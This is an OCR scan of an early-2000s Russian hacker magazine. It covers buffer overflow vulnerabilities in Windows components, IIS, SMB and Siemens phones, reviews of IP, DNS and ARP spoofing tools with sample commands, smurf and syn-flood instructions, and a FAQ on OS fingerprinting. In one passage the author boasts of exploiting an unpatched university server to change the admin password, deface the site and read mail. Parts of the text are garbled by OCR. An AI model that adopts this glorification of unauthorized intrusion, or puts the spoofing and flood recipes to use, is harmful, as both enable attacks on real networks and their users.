доступно: читать, редактировать, уда- 
лять любые срайлы, закачивать COCP- 
тины и выполнять их на компе жерт- 
вы. К несчастью, эксплоит еще не вы- 
пущен :(, только теория... Защита, 
предлагаемая народными умельцами, 
проста - вырубить в настройках прото- 
кол Gopher, ведь в Инете очень мало 
таких серваков. За более подробной 
инфой ползи на народно любимый 
www.microsoft.com/technet/security/c 
urrent.asp. 

Продолжаю мучить "великий" сер- 
вант от мелкомягких. Сейчас в опалу 
попал IIS версией 4.5. Переполнение 
буфера нашли в компоненте 
ASP.DLL. CHINANSL Security Team 
первыми представили работающий 
эксплоит, который, правда, тестиро- 
Banca на китайской версии Windows 
2000 :), но, тем не менее, он очень 
крут! Эксплоит переполняет буфер и 


Наш герой! 


открывает 1-й порт, на который ве- 
шает системную консоль виндов! Код 
этого чуда можно взять тут: 
http://www.securitylab.ru/?ID=30586. 
Я его слил, скомпилил, запустил и, 
как честный человек, протестил на 
информатике в универской сетке (Ва- 
лера, привет!), где админ поставил се- 
бе сервер на виндах :). Ну что ска- 
зать... Зря он патчи не ставил - я сме- 
нил пароль админа, задефейсил глав- 
ную страничку, поковырял мыло, и 
все это легко и красиво через кома- 
наную строку! Но был замечен один 
глюк: иногда на серваке выскакивает 
мессага об ошибке occured.anyhow; 
если юзер не закроет окошко, то 
эксплоит не будет фурычить {(. 
Дальше полним буфер последних 
разработок мелких: локальное пере- 
полнение буфера в ехрюгег.ехе. Сра- 
зу скажу, что этот финт исключитель- 
но под ХРень - народ тестил на 
Windows XP SP1, и у них работало, ау 
меня на W2k pro rus SP2 не хочет. 


эксплоит 
Нужно намутить файл desktop.ini co 
следующим содержимым: 


[.ShellClassInfo] 
ААА... (всего 2300 символов). 


Переполнение буфера происходит 
при просмотре каталога, где лежит 
этот desktop.ini. Как использовать, ду- 
маю, сам догадаешься. 


ФИЛЬМЫ И МУЗЫКА - 

ОПАСНЫ! 

Експлорер воистину полон дыр на пе- 
реполнение: при автоматическом чте- 
нии атрибутов файлов MP3 и WMA 
Експлорером Windows ХР происходит 
переполнение буфера, дающее воз- 
можность удаленного исполнения 


произвольного кода в системе. А са- 
мое-то интересное, что cpaiin даже не 
надо открывать на воспроизведение, 
- проявление глюка происходит при 
простом просмотре папки, в том чис- 
ле через Internet, расшаренный ката- 
лог и т.д. Конечно, звуковой файл 
должен иметь специальные теги, но 
эксплоит уже в пути. Возможно, когда 
ты будешь читать эти строки, его уже 
можно будет найти на wWww.security- 
lab.ru. И хотя эксплоит еще не готов, 
дядя Билл уже подсуетился и выпус- 
тил патчик, который нужно слить с 
мелкомягкой паги, так что счастливые 
юзеры ХРюши смело бегите и отда- 
вайте траф злому Гейтсу. 


ЗЛОБНЫЙ ТЕКСТОВИК 

Бредем дальше. Security Defence 
Stdio сообщили, что в Windows 
'riched20.dll' обнаружено переполне- 
ние буфера, позволяющее удаленно- 
му пользователю аварийно прибить 
приложение. Переполнение буфера 
может быть вызвано специально об- 
работанными атрибутами в КТЕ фай- 
ле, когда DLL рисует figure-string 
(‘\fs'). Переполнение буфера проис- 
ходит, когда (\fs) устанавливает раз- 
мер шрисфта, превышающий 1024 
байт. Другие атрибуты могут быть 
также уязвимы. Вот как вызывали пе- 
реполнение: 


ОБВАЛ БАННЕРОВ 

А сейчас пополним бусферок в юнихе: 
BannerWheel (бесплатный сценарий 
для показа баннеров для УМХ сис- 
тем). Вот так его можно вырубить: 


Все! Буфер полон, со всеми вытека- 
ющими. 


БАГ НА ХАЛЯВУ 

Вот дыра BO фришном web-cepBepe с 
открытым исходным кодом Savant для 
9x, МЕ, МТ, 2000-х и ХРеновых вин- 
дов. Там нашли переполнение буфер- 
ка и написали експлоит: 


Более подробно на http://soldierx.com. 


ВИСЯК НА ОБЩАК 
Нашли дырку и в SMB (Server 
Message Block) - протоколе, который 
мелкомягкие использует для орга- 
низации общего доступа к файлам, 
принтерам, последовательным пор- 
там, а также для связи межу компь- 
ютерами с использованием имено- 
ванных каналов и почтовых слотов. 
Клиент делает SMB запрос о ресур- 
се, и сервер отвечает клиенту SMB 
пакетом, используя 
request/response протокол. 
Специально обработанный SMB 
запрос может привести к зависанию 
системы. Для выполнения сей атаки 
тебе можно иметь лишь анонимную 
учетную запись! Уязвимость может 
использоваться для выполнения 
произвольного кода. Дыра найдена 
в Windows МТ 4.0 Workstation, 
Windows NT 4.0 Server, Windows 
2000 Professional, Windows 2000 
Server, Windows 2000 Advanced 
Server, XP Professional. To ecTb Ba- 
лятся все NT'WHbie ОСы. Эксплоит 
ищи на секьюритизоне. Его пока там 
нет, но обещают! 


ЧИСТА БОНУС :) 

И напоследок чисто фрикерское пе- 
реполнение буфера в сотовике 
Siemens серии 45. 

Чуток теории: для вставки в сооб- 
щение картинки используется такая 
конструкция: "YIMG_NAME", вот тут- 
то и кроется глюк на переполнение. 
157 точек, поставленные в теге, ука- 
зывающем на картинку, будут слу- 
жить причиной переполнения буфе- 
ра в телефончике. После получения 
сего злостного послания телефон мо- 
ментально вырубается с каким-то 
странным пуканьем. Когда ты его 
включишь, он будет работать как 
всегда, но зайти в Message->Inbox те- 
бе будет очень проблематично. Реше- 
ние сего трабла есть только одно - 
ждать, пока разработчики выпустят 
новую версию прошивки, и тогда за- 
качать ее в телефон. 


EXIT(0) 

Вот такая веселая картинка вырисо- 
вывается с использованием перепол- 
нений в нашей нелегкой жизни. И ес- 
ли ты хочешь носить гордое звание 
бойца невидимого сфронта, то тебе 
овладеть сей технологией просто не- 
обходимо. 


В ПРОДАЖЕ С 17 ма 


> ТРТУ 7-7 - 
В номере: 
ПОДРОБНЫЙ ОТЧЕТ О ЕЗ 
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ЗОЕТ/ПОШЛИ ВСЕХ ОТ ЧУЖОГО ИМЕНИ! 


ПОШЛИ ВСЕХ 
ОТ ЧУЖОГО ИМЕНИ: 


ОБЗОР ТУЛЗ ДЛЯ СПУФИНГА ПОД ВЫНЬ 


Alex Shark (qqqqqwww@e-mail.ru) 
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режде чем препариро- 
вать пакеты, давай выяс- 
ним, зачем нам это нужно. 


ЧТО ТАКОЕ СПУФЕР? 

Спуферы - это программы, с помощью 
которых ты сможешь послать в сеть 
любой пакет данных. Всего их нес- 
колько основных видов. В первую 
очередь это спуферы, скажем так, 
высокого уровня. К ним относятся все 
проги, которые шлют в сеть пакеты 
прикладного уровня. Это всякие mMail- 
бомберы, сканеры веб-пагов и даже 
брут-форсеры для ломки pop3-akka- 
унта. Короче, это все, что может слать 
пакеты в не совсем стандартном ко- 
личестве или качестве. 

Например, отличие спуфера от обыч- 
ного мылера в том, что он может сам 
перебрать файл со списком паролей. 
Или разослать тонны письмишек по 
разным адресам. К ним же можно от- 
нести остальные брут-форсеры, напри- 
мер, ломалки Нр-аккаунтов. Но это не 
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Мыл-бомбер тоже спуфер 


есть как бы подмене твоего адреса, 
основана атака, называемая smurf. 

В таких прогах обычно можно посы- 
лать пакеты, формируя их Ha Ethernet 
уровне. То есть можно послать абсо- 
лютно правильный пакет, но с другой 
сетевой карточки, которой и в приро- 
де может не существовать. 


ПРИКЛАДУХА 

Прежде всего хочется вспомнить 
IcnewQ. В ней под spoof понималась 
рассылка сообщений от другого UIN- 
а. Само по себе безобидное занятие, 
но только не для древней 98-ой аси. 
Достаточно было послать сообщения 
от примерно пятидесяти человек, для 
того чтобы запарить перца и добить- 


Hangupping перед боем 


ные к тому времени звуки. Есть еще 
пачка мыл-бомберов и брут-форсе- 
ров, но это уже не так интересно. 


ДРУГИЕ ТУЛЗЫ 

Низкоуровневый Cnycpep, как ты уже 
прочитал, это в первую очередь 
Telnet. В первую, потому как доступен 
практически везде и не требует много 
ресурсов. Есть еще такая хорошая 
прога X-Spider, в которой есть и ТСР, и 
UDP коннектор. То есть ты можешь 
послать из этой проги лажовые дан- 
ные по обоим основным протоколам. 
ТСР коннектор ничем особым от тел- 
нета не отличается. Единственная раз- 
ница: он отсылает данные по нажатию 
на пимпочку, а телнет шлет их во вре- 


Spoof - англ., интересные спудферы, поскольку они 


ош" Только упрощают жизнь, но не позво- . 
обман ляют делать что-то нестандартное. Отличить пакет настоящий от пакета, 


ЧЕМ НИЖЕ, ТЕМ ИНТЕРЕСНЕЕ сгенерированного спубфером, невозможно 


раде СТ: 


Спуферы, скажем так, низкого уровня 
немного интересней. Это проги, кото- 
рые позволяют послать любой ТСР 
или UDP пакет. На первом месте стоит 
любимый telnet. Пользуя его на 80-м 
порту, можно узнать, какой стоит сер- 
вак у твоего "товарисча". Пользуя на 
21-м порту, можно выяснить версию и 
производителя ftp-cepBepa. Вообще, 
это крайне полезная утилита. При же- 
лании и сноровке можно послать па- 
кет buffer-overflow с шеллом. Но это 
равносильно написанию асм-кода в 
far'e, то есть теоретически возможно, 
но практически никто не пробовал. 
Спуферы пакетного уровня дают воз- 
можность посылать вообще все, что 
тебе угодно. То есть ты можешь пос- 
лать пакет с битой контрольной сум- 
мой. С неверным исходящим 1Р-адре- 
сом. С левым исходящим портом (да- 
же нулевым). Можно вообще натво- 
рить очень много. Именно этот вид 
спуферов, как правило, рассматрива- 
ется как "спуферы". На принципе 
ложного посыла исходящего IP, то 
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ся OT него удаления сообщений без 
предварительного просмотра. После 
чего послать ему сообщение от его 
же UIN-a. Это называлось хана тете 
асе. После удаления самого себя пе- 
рец улетал из аськиной сети, иногда 
просто до перезагрузки, иногда до пе- 
реустановки аси. Для аси есть еще 
один высокоуровневый срлудер, кото- 
рый зовется ICQRevenge. С него мож- 
но заслать пачку писем, которые све- 
тятся в асе такими маленькими бе- 
ленькими конвертиками. Шутка по су- 
ти тоже безобидная. Но если перец 
ушел спать и отрубил асю, можно бы- 
ло заслать даже на медленном моде- 
ме эдак тысяч десять письмишек. 
После его выхода в он-лайн наступал 
жуткий ступор, с визгом аси и концом 
Интернета. Это не рор3, а следова- 
тельно, зайти на сервак и просто 
грохнуть все сообщения не выйдет. 
Нужно было долго и нудно принимать 
их, при этом выслушивая ненавист- 


мя набора. Но если есть возможность 
качать, то для этих целей лучше ис- 
пользовать Netcat, портированный с 
линукса. В нем есть возможность и 
посылать, и принимать данные на лю- 
бом порту. Это такая универсальная 
слушалка-посылалка. Как правило, 
именно ее применяют при buffer over- 
flow, если ломают W32-Tauky. 


a #й 


Аналог Hangupping с расширенными 
функциями 


К этому же бравому семейству можно 
отнести прогу hangupping. Сия прога 
отлично работает против модемщи- 
ков: она отсылает пинг с данными 
"+++ATHO", на что второй комп пыта- 
ется послать ответ с теми же данны- 
ми. И если у него модем He ZyXEL и 
он не поменял код управляющего 
символа на что-нибудь отличное от 
"+" он банально падает. То есть его 
модем, перехватив "+++", считает, что 
это к нему обращаются и, получив ко- 
MaHgy "АТНО", кладет трубочку. 
Очень хорошо работает против мно- 
гих внутренних модемов. Соответ- 
ственно не работает в локалке. 


ПАКЕТЫ, ПАКЕТИКИ! 

И, наконец, самое вкусное. Для W2K 
моими пеленгаторами толком ничего 
безглючно работающего не найдено. 
Есть проги, которые умеют слать ARP- 
пакеты, есть проги, которые пытаются 
слать Ethernet пакеты, но на практике 
вылетает только 1 из 5 посылок. Зато 


под 98-ми и четвертой МТ все работает. 


Первый в списке победителей, как ни 
странно, сниффер. Звать ero NetXray. 
В нем есть функция посылки пакета. 
При этом можно собрать пакет руками 
и посмотреть, что получится. Можно 
собрать на каркасе, то есть контроль- 
ную сумму за тебя просчитает прога. 


Exploit generator, окно для $роо!-акции 


лать 60 кило инфы. Послать нес- 
колько пакетов, примерно на 55 ки- 
ло, указав в каждом флаг дефраг- 
ментации, то есть что это еще не вся 
инфа. После чего открыть вторую 
сессию и повторить. Это приведет к 
тому, что на тачке будет забиваться 
память по 55 кило за раз. Освобо- 
дить она ее не может, потому как 
ждет окончания. Конечно, сессии от- 
валятся по тайм-ауту, поэтому дан- 
ный способ отлично работает в ло- 
калке и практически не причиняет 
вреда на модемном соединении. При 
такой атаке можно даже не замора- 


Exploit generator, Tak он выглядит 
в самом начале 


Можно даже вообще не собирать, а 
просто выловить пакеты из сети и пе- 
репослать их. Кстати, последняя вещь 
очень пригодится для облома качаю- 
щих. То есть можно перепосылать па- 
кеты из Ир-сессии, что достаточно час- 
то приводит к краху Ир-клиента. 

При посылке пакета вручную можно 
замутить множественную gecppar- 
ментацию. То есть послать пакет на 
открытие сессии. Пообещать прис- 
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Еще одна прога для сборки и посылки 
пакетов - ужасно глючная Bi 


чиваться на ТСР пакетах, все это от- 
лично работает и на ICMP уровне. 
Используя возможность отсылать па- 
кеты с ложным исходящим 1Р-шни- 
ком, можно сделать мини-зти!!. Ос- 
новная сила этого вида атаки в коли- 
честве "размноженных" пакетов. Есть 
такая хорошая вещь, как broadcast- 
адрес. Это последний адрес в подсе- 
ти. То есть если сеть с адресом 1.2.3.0 
и маской 255.255.255.0, то бродкасто- 


вый IP будет 1.2.3.255. Его получат 
все машины, и при нормальных усло- 
виях они должны будут на него отве- 
тить. Допустим, что в сети реально 
существует 50 компов. Тогда, послав 
всего один пакет, мы получим в ответ 
50 пакетов. А если подменить исходя- 
щий IP, то получим не мы, а тот перец, 
который сидит на этом IP. Если у тебя 
уже есть на примете такая сетка, то 
запуская Х-рей Ha прослушку исходя- 
щего трафика и яростно пингуй эту 
сетку. После этого тебе надо отобрать 
1-2 наиболее понравившихся пакета и 
исправить в них исходящий IP-agpec. 
Все, smurf своими руками готов! 


ВСЕ РУЧКАМИ 

Есть еще такая интересная прога - 
Ntpacket. В ней надо все считать са- 
мому, но, к сожалению, ни один бо- 
лее-менее нестандартный пакет вып- 
люнуть из нее не удалось. Если все 
рассчитать правильно, то пакет уле- 
тает на ура, но если воткнуть кривую 
контрольную сумму или задать длину 
меньше (больше) реальной, то пакет 
просто теряется в недрах winsock. 
Для старого доброго 98-го и модем- 
ного соединения есть еще прога 
Exploit Generator. 

Она позволяет слать пакеты прями- 
ком через RAS, то есть эмулируя 
практически всю систему формирова- 
ния пакетов. В нем есть очень наво- 
роченный спудфер и достаточно прод- 
винутый бомбер стандартными Land и 
smurf пакетами. Тут можно формиро- 
вать абсолютно любой пакет IP-ypoB- 
ня. Автоматом просчитывается толь- 
ko Ethernet протокол. Можешь слать 
с нулевого порта, можешь посылать 
от левого 1Р-шника. Можно даже по- 
баловаться с установкой флагов RST, 
FIN, SYN и т.д. Незаменимая вещь для 
syn-flood! Позволяет отослать запро- 
сов на тысячи соединений за считан- 
ные секунды. Многие параметры уме- 
ет брать на лету. То есть можешь ско- 
пировать из аси IP собеседника, а BOT 
вставка его в качестве цели и нажа- 
тие кнопочки kill уже произойдет ав- 
томатом. Правда, может возникнуть 
маленькое недоразумение, если ты 
просто любишь смотреть IP в аське. 
Только посмотрел, а его уже и нет :) 
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Уречу 1950 


Неверная 
контрольная 
сумма угробит 
пакет на пер- 
вом же марш- 
рутизаторе, 
если он не уг- 
робится сам 


Используя 
NetXray, заму- 
тить smurf- 
атаку не сос- 
тавит никако- 
го труда: от- 
ловил пакет, 
поменял IP, 

и порядок! 


Обы 4hack 


АЛИСА, ЭТО СПУФИНГ: 


УНЕСИТЕ: 


ИНСТРУМЕНТЫ ДЛЯ СПУФИНГА В LINUX 


Сетевых про- 
токолов и тех- 
нологий очень 
много, поэтому 
и спуфинг бы- 
вает разных 
видов 


раде 


Ушаков Андрей 
aka A-nd-Y (Andy_@timus.ru) 


реди хакерских cpu- 
шек есть такой инте- 
ресный и полезный 
прием, как спуфинг. Ты до сих пор 
не знаешь, что это такое? Тогда 
вкратце расскажу. Суть спуфинга 
состоит в том, чтобы подменять 
source адрес в отправляемых паке- 
тах на ложный, таким образом об- 
манывать различные системы за- 
щиты, производить DOS атаки, пор- 
тить жизнь соседям и делать про- 
чие нехорошие вещи с малой веро- 
ятностью быть обнаруженным :). 
Хотя я бы в какой-то мере отнес к 
спуфингу изменение и других пара- 
метров пакета, то есть преднаме- 
ренную генерацию ложных пакетов 
с заданными свойствами с целью 
выдать их за действительные. 


http://www.securityfocus.com 


ме. Подумай, что будет, если, нап- 
ример, source IP будет заменен на 
локальный, типа 127.*.*.*? 

Многие программы защищены от 
этого, но остались и те, что зацик- 
ливаются и теряют свою работос- 
пособность. 

Я хочу, чтобы ты сразу понял, что 
спуфинг не является чем-то обо- 


Непосредственно программ, 
направленных только на спусфинг, не так 
уж и много - функция спуфинга является 

дополнением в системах тестирования 
безопасности, сканерах, снифоферах 

и прочих сетевых утилитах 


СПУФИНГ КРАПЧАТЫЙ 

Сетевых протоколов и технологий 
очень много, поэтому и спуфинг 
бывает разных видов. Среди самых 
распространенных: 

= IP спуфинг - подмена source IP, 
возможность производить неотсле- 
живаемые DoS атаки, сканирование 
ит.п.; 

= МАС спуфинг - подмена source 
МАС, позволяет устраивать МАС 
флуд в локалке и изменить марш- 
рутизацию в сетке, а следователь- 
но, и вывести на какое-то время 
сеть из работоспособного состоя- 
ния; 

= DNS спуфинг - атака на DNS, 
позволяющая изменить резолвинг 
определенных адресов, тем самым 
заблокировав доступ к определен- 
ным хостам, или же выдать себя за 
другой хост. 

Также стоит отметить, что многие 
программы уязвимы для спуф-атак 
и позволяют получить таким обра- 
зом поднятые привилегии в систе- 
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собленным. Непосредственно прог- 
рамм, направленных только на спу- 
финг, не так уж и много - функция 
спуфинга является дополнением в 
системах тестирования безопаснос- 
ти, сканерах, снифоерах и прочих 
сетевых утилитах. 

В своем обзоре я рассмотрю при- 
менение спуфинга в программах 
для различных задач, чтобы ты мог 
иметь представление, какое практи- 
ческое применение имеет спуфинг. 


SING 
http://sourceforge.net/ 
projects/sing/ 
Очень функциональная программа 
для формирования различных паке- 
тов с различными параметрами. По- 
жалуй, единственный "чистый" спу- 
ep из представленных в обзоре. 
Можно указать тип icmp пакета: 
Echo Reply, Router Solicitation, 
Destination Unreachable, длину na- 
кета, содержание пакета и т.д. Есть 
возможность посылать фрагменти- 


Ты уже установил линух и с головой ушел в чтение манов и умных книжек, но за всем 
этим не забывай, что правильная ось изначально была и остается осью хакерской. 


http://www.securitylab.ru, 
ищем эксплоиты... 


рованные пакеты, указывать марш- 
рутизацию, адрес отправителя, 
МАС адрес, TTL и TOS, тип опера- 
ционной системы и еще много по- 
лезных вещей. 

Sing включает в себя все возмож- 
ности программы ping, а также мно- 
жество своих функций, поэтому яв- 
ляется отличной заменой традици- 
онному ping. 


Пример запуска: 
sing 212.23.95.156 - обычный пинг заданно- 
го хоста. 
sing 212.23.95.156 -5 212.23.94.188 - пингуем 
хост 212.23.95.156 с поддельным source ag- 
ресом 212.23.94.188. 


Sing, пожалуй, можно назвать OG- 
ной из лучших тулз по работе с па- 
кетами, в частности с icmp. Эту 
программу можно применять для 
DoS атак, исследования уязвимос- 
тей в маршрутизации сети, тестиро- 
вания фаерволла - все ограничива- 
ется лишь твоей фантазией. Sing - 
мощный инструмент для спуфинга 
с большим набором функций. 


ЕТТЕВСАР 

ПЛАГИНЫ PHANTOM, SPECTRE 
http://ettercap.sourceforge.net 
He будем забывать, что, помимо 
функций сниффера, еЦегсар со- 
держит полезные плагины, в том 
числе и для спуфинга: 

Phantom - спуфер DNS. Отправля- 
ет Ha DNS сервер пакеты с указани- 
ем ложных данных, вследствие че- 
го может получиться DNS poisoning 
(забивание кеша сервака ложными 
парами URL - IP). 


Пример запуска: 
ettercap - Мар phantom 


ЗОЕТ/АЛИСА, ЭТО СПУФИНГ! УНЕСИТЕ! 


Flood width spoofing 


Spectre - MAC спуфер-флудилка 
для локалки. Засылает в сетку кучу 
ARP пакетов с поддельными мака- 
ми, засоряя тем самым кеши сете- 
вух, сбивая таблицы маршрутиза- 
ции, таким образом нарушая рабо- 
Ty сети на канальном уровне. 


Пример запуска: 


Nd 
Ма 


Напомню значение используемых 
опций. М - запуск без графического 
интерфейса, 4 - указывает на то, 
что не нужно резолвить хосты, р - 
указывает, собственно, на то, что 
нужно юзать данный плагин, кото- 
рый указывается после опций. 

В представленных плагинах отсут- 
ствует как таковая возможность 
самостоятельно задать параметры 
для отсылаемых пакетов, что огра- 
ничивает их применение лишь 
простыми атаками Ha DNS и DoS на- 
падениями. 


DNSSPOOF, ARPSPOOF 

(из пакета Dsniff) 
http://www.monkey.org/ 
~dugsong/dsniff/ 

Приложения из пакета для работы 
с сетью Dsniff. 


Dnsspoof посылает ложные отве- 
ты Ha DNS сервера с произвольным 
адресом и id в последовательности 
пакетов. Набор хостов и соответ- 
ствующих айпишников для спу- 
финга указывается в файле с рас- 
ширением .hosts и синтаксисом 
файла /etc/hosts, с поддержкой 
шаблонов типа *mynet.net, только 
без указания алиасов. 


Пример запуска: 


dnsspoof -i e 


10 -f myspuf.he 


"-| ethO" указывает, какой интер- 
фейс использовать, "-f 
myspuf.hosts" указывает на файл с 
данными для спуфинга. 

Arpspoof - это ARP спуфер, ис- 
пользуемый в пакете Dsniff для пе- 
ренаправления трафика с одного 
хоста на другой, позволяет произ- 
водить сниф на свитчах. 


Сканим птар'ом с опцией спуфинга 


Не забывай, что у всех рассмот- 
ренных мною программ есть тап 
руководства, которые неплохо бы- 
ло бы почитать, если ты хочешь 
лучше изучить эти программы. 

Знание ТСРЛР тоже лишним не 
будет, тем более что в Инете доста- 
точно инфы по этому вопросу. 


NMAP 
http://www.insecure.org/nmap 
Известный сканер портов, который 
также использует технологию спу- 
финга при сканировании. Для это- 
го используется опция "-D" co 
списком хостов/айпишников, кото- 
рые нужно использовать в подде- 
ланных пакетах. 


Сканим 213.140.104.195, используя 
спуф адреса 


(смотри скриншот). 


№тар позволяет подставлять ука- 
занные адреса в заголовки отправ- 
ляемых пакетов, тем самым CO3ga- 
вая видимость того, что пакеты 
идут с различных машин, что зат- 
рудняет обнаружение сканирова- 
ния данного хоста. Но у этого мето- 
да есть одна особенность, твой 
собственный хост также будет сре- 
ди указанных в спуф-списке, даже 
если ты не указал его сам. 


РАЗЛИЧНЫЕ ЭКСПЛОИТЫ 

И УЯЗВИМОСТИ 
http://www.securitylab.ru, 
www.securityfocus.com 

Как ты уже догадываешься, спу- 
CPUHT не был бы столь распростра- 
ненной хакерской фишкой, если бы 
не существовало софта, уязвимого 


к спуфингу. Как ты знаешь, чтобы 
использовать найденную уязви- 
мость, пишут код aka эксплоит, ко- 
торый позволяет произвести атаку 
на дырявый софт и получить, нап- 
ример, поднятые привилегии или 
просто завалить тачку. Здесь ты 
уже в зависимости от конкретной 
задачи будешь искать нужный тебе 
эксплоит. Но подумай, как приятно 
писать экплоиты самому, а не наде- 
яться на чужие, а еще более прият- 
но, когда твоим творением пользу- 
ются другие люди. Из чего делай 
вывод - изучать программирование 
нужно и очень важно. В этом слу- 
чае ты будешь ограничен только 
своей фантазией. Изучай С и Perl - 
это важнейшие языки для любого 
никса, с помощью них можно реа- 


лизовать множество задумок по 
созданию собственных пакетов. 
Как видишь, спуфинг (то есть 
построение пакетов с твоими 
собственными параметрами) мало 
полезен, если юзать его без каких- 
либо других средств. Только если 
использовать спуфинг комплексно 
с другими прогами или как cpeg- 
ство, вносящее дополнительные 
возможности в этот софт, становят- 
ся видны все преимущества Cnycpa. 
В простейшем случае спуфинг мо- 
жет быть применен как средство 
для скрытия реальных хостов при 
DoS атаке или сканировании yga- 
ленной системы. В сложных зада- 
чах - как средство обхода cpaep- 
вольной защиты, защиты маршру- 
тизаторов, но это уже требует бо- 
лее тщательной подготовки и изу- 
чения, а также весьма приличного 
запаса знаний в области сетевых 
технологий и программирования. 


ай 
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Е сли кто не в курсе, 
FAQ - Frequently 


Asked Questions (ЧаВо - 


часто задаваемые 
вопросы). Эта рубрика 
позволит закрепить 
полученные хакерские 
знания, прояснить 
непонятные термины, 
узнать тонкости. 


HACK-OS 


Матушка Лень 
(mlen@mail.ru) 


Что такое 


сетевая ОС? 


Это такая операционка, в которой есть 
средства для выхода в сеть. Например, ты 
можешь установить под обычный голый 
DOS дрова для сетевого адаптера, устано- 
вить сетевой менеджер и клиент какой- 
нибудь сетевой службы. Так DOS станет 
сетевой осью. Но времена всяческих при- 
мочек, припарок и надстроек давно прош- 
ли: теперь большинство OC (и Windows, и 
Unix) изначально сетевые. То есть все се- 
тевые навороты встроены в систему. 

К чему я это все? Да к тому, что мы будем 
говорить о сетевых осях, ведь как хакеру 
пробраться на несетевую тачку? Только 
посредством вирусов, но, к сожалению, 
без обратной связи. Подробнее о сетевых 
операционках стоит почитать здесь: 
http://doc.trecom.tomsk.su/citforum.ru/win/ 
operating_systems/sos/glava_4.shtml 


Как определить 


тип удаленных 
сетевых ОС? 


Перед взломом удаленной системы хакер 
должен узнать ee тип: Win или Lin, либо 
что-то другое. Ну и, в зависимости от ре- 
зультатов, выбрать подходящий способ 
залезть на чужой комп. 

Многие сервера сами по умолчанию 
рассказывают о себе. Например, Web- 
сервер может выдать свою версию и 
версию ОС вместе с сообщением об 
ошибке 404, похожего ответа можно go- 
биться от почтового или файлового сер- 
вера или при попытке установить telnet- 
соединение. Но осторожно! Грамотный 
администратор может отключить эти со- 
общения, а хитрющий админ может нав- 
рать, то есть подменить текст ложными 
сообщениями. 

Для более точного определения типа 
операционки можно использовать сканер 
птар, в этой статье ты найдешь подроб- 
ный рассказ о различиях осей: 
http://www.insecure.org/nmap/nmap-fin- 
gerprinting-article-ru.html. Тут все уже 
завязано на анализ протоколов. Одни и 
те же протоколы реализованы в разных 
версиях WIN/LIN и других осей по-разно- 
му, поэтому, анализируя нюансы их рабо- 
ты, можно определить тип ОС. Для этого 
нужна специальная прога типа птар или 
xprobe (http://www.sys-security.com/ 
html/projects/X.html). Надо быть готовым 


к тому, что админы не дремлют и пытают- 
ся бороться со сканированием своей оси 
(http://www.void.ru/content/976). 

Однако He всегда хакеру обязательно 
запариваться версией и типом ОС, ведь 
он может сразу воспользоваться скане- 
ром сетевой безопасности (например, 
http://www.xspider.ru/, шестая версия 
бесплатная, а седьмая обещает стать ком- 
мерческой), сканер выдаст готовые дыры, 
к которым останется только подобрать 
эксплойты. 


Что такое 


сервис? 


Сервис - это и есть истинная причина 
хака. На что может позариться сетевой 
мошенник: на базу данных с важной 
инфой (кредитками, порнушкой, лич- 
ными данными пользователей, корпо- 
ративными секретами), на доступ к ка- 
налу связи или к управлению серве- 
ром. Все это ресурсы, за которые и бо- 
рются хаксоры. Сервис - это мостик 
между клиентом и ресурсом, к которо- 
му нужно получить доступ. Например, 
отправка электронной почты, загрузка 
файлов, доступ к базе данных - это все 
сервисы (услуги). 

Проблема в том, что чем больше сервер 
предоставляет всяческих возможностей 
(сервисов), тем более он уязвим. Напри- 
мер, WEB-cepBep без скриптов защищен 
намного сильнее, чем сервер с ними. 
Скрипты предоставляют дополнительные 
возможности типа ведения гостевой кни- 
ги, регистрации пользователей, организа- 
ции чата и тому подобных примочек, но 
они же являются лазейками для эксплой- 
тов! То есть, добавляя новые возможнос- 
ти к своей паге, ты всегда добавляешь но- 
вые дыры! Как быть? 

WINDOWS идет по пути «разрешено 
все, что не запрещено», то есть по 
умолчанию включено множество инте- 
ресных сервисов, которые пользовате- 
лю часто не нужны, зато хаксору могут 
пригодиться (кстати, в Windows Server 
2003 такая бага пофиксена, и галочки 
на нужных лично тебе сервисах надо 
поставить еще на стадии установки - 
прим. peg.). Linux go недавнего времени 
подчинялся концепции «запрещено все, 
что не разрешено», однако данная кон- 
цепция вызывает мегагеморрой у поль- 
зователя, поскольку все сервисы нужно 
специально настраивать! 


Зачем 
нужны 


заплатки? 


Хакеры постоянно находят новые 
дырочки в любой системе, поэтому 
рекомендуется для Вынь постоянно 
скачивать новые Service Pack 
(http://www.microsoft.com/win- 
dows2000/downloads/servi- 
cepacks/default.asp либо 
http://www.microsoft.com/win- 
dowsxp/pro/downloads/default.asp), 
a для Линь ядро посвежее 
(http://www.kernel.org/). Это каса- 
ется не только самой оси. Конечно 
же, необходимо постоянно патчить 
и другие программы, задействован- 
ные в общении с сетью. 

Однако многие админы, да и прос- 
то рядовые пользователи забивают 
на этот изнурительный процесс, по- 
этому на некоторых системах рабо- 
тают лазейки трехлетней давности. 


Что такое 
ISO/OSI? 


Я уже не раз рассказывал тебе о 
модели взаимодействия открытых 
систем (ISO/OSI Open System 
Interconnection / International 
Standards Organization), это между- 
народный сетевой стандарт, о KOTO- 
ром ты можешь прочесть здесь: 
http://www.citforum.ru/nets/proto- 
cols/1_01_02.shtml. Это семь уров- 
ней, которые удобно применять для 
понимания работы сети, но в опера- 
ционках не все так гладко. Давай 
разберемся, какие сетевые функ- 
ции ты используешь чаще всего. 
Первым делом идет физическая 
среда (физический уровень). Са- 
мый простой способ соединения 
компьютеров - через СОМ-порты. 
Модемное соединение ничем от 
СОМ-портовского не отличается. В 
режиме установленного модемного 
соединения два компа вообще не 
видят модемы. Модем может быть 
кабельным, спутниковым или pagu- 
омодемом, это суть дела не меняет. 
Также можно соединяться через 
LAN-agantepbl. Можно соединяться 
через USB и FireWire (IEE 1394). Че- 
рез Bluetooth. В Windows и Linux за 
это отвечает драйвер физического 
устройства. 

Дальше начинаются непонятнос- 
ти, ведь физический уровень отве- 
чает за электрические сигналы и 
все. Однако эти сигналы должны 
подчиняться логике, для этого есть 
логический уровень управления 
звеньями данных (канальный уро- 
вень). На этом уровне сетевое уст- 


ройство имеет MAC-agpec (Media 
Access Control). А также имеется 
LLC-nogypoBeHb (Logic Link 
Control). Эти логические функции 
выполняет в WINDOWS мифический 
«адаптер удаленного соединения», 
заметь, что без него ты не смо- 
жешь работать даже с модемом. 
«Адаптер удаленного соединения» 
имеет привязку к драйверу сетево- 
го устройства, а драйвер обращает- 
ся напрямую к соответствующей 
сетевой карте. В Вынь МАС-адрес 
можно изменить с помощью редак- 
тирования реестра 
(http://www.void.ru/content/856), 
ав Линь - с помощью ifconfig. Эти 
методы хаксоры используют для 
воровства Интернет-трафика в 90- 
машних сетях 
(http://vxc.narod.ru/txt/trafic.htm), 
флуда и других пакостей 
